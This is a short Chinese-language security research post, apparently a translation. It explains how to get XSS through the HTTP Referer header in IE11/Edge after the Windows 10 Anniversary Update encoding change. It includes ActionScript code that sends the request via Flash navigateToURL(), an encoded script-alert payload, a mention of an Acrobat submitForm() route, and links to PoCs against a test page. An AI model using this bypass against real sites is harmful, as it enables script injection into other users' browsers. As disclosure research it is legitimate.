周年更新后通过Referrer实现XSS攻击

自Windows 10周年更新以来，微软似乎修复了IE11/Edge上的一些XSS技巧。Referrer行为就是其中之一。

背景介绍

以下页面直接写入HTTP_REFERER和document.referrer： https://vulnerabledoma.in/xss_referrer

此前IE/Edge不会对Referrer字符串中的"<>字符进行编码。因此，我们可以通过以下PoC在该页面上实现XSS： https://l0.cm/xss_referrer_oldpoc.html?

但在Windows 10周年更新后，IE11/Edge对其进行了编码。从该页面你将获得以下编码后的字符串：

1
2

HTTP_REFERER: https://l0.cm/xss_referrer_oldpoc.html?%3Cscript%3Ealert(%221%22)%3C/script%3E
document.referrer: https://l0.cm/xss_referrer_oldpoc.html?%3Cscript%3Ealert(%221%22)%3C/script%3E

太糟糕了！

当然，我们仍然可以使用Win8.1/7 IE11。但我们也想在Win10上实现XSS，不是吗？:D

新技术方案

今天，我想介绍一个小技巧，在最新的Win10 Edge/IE11上使用Referrer实现XSS。

该技术非常简单。如果你从Flash的navigateToURL()方法发送请求，就可以轻松地将"<>字符串包含在Referrer中，如下所示：

https://l0.cm/xss_referrer.swf?

ActionScript代码如下：

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11

package {
 import flash.display.Sprite;
 import flash.net.URLRequest;
 import flash.net.navigateToURL;
 public class xss_referrer extends Sprite{
  public function xss_referrer() {
   var url:URLRequest = new URLRequest("https://vulnerabledoma.in/xss_referrer");
   navigateToURL(url, "_self");
  }
 }
}

从访问结果可以看出，我们可以通过Referer请求头实现XSS。但遗憾的是，我们无法通过document.referrer属性实现XSS，因为它变成了空值。唉:p

其他攻击向量

另外，我还可以通过Acrobat API的JavaScript中的submitForm()方法复现此问题。

我在带有Adobe Reader插件的Win10 IE11上确认了这一点。

PoC在这里： https://l0.cm/xss_referrer.pdf?

似乎通过插件发出的请求没有被考虑在内。

总结

就是这样。在某些情况下可能会有所帮助 :) 谢谢！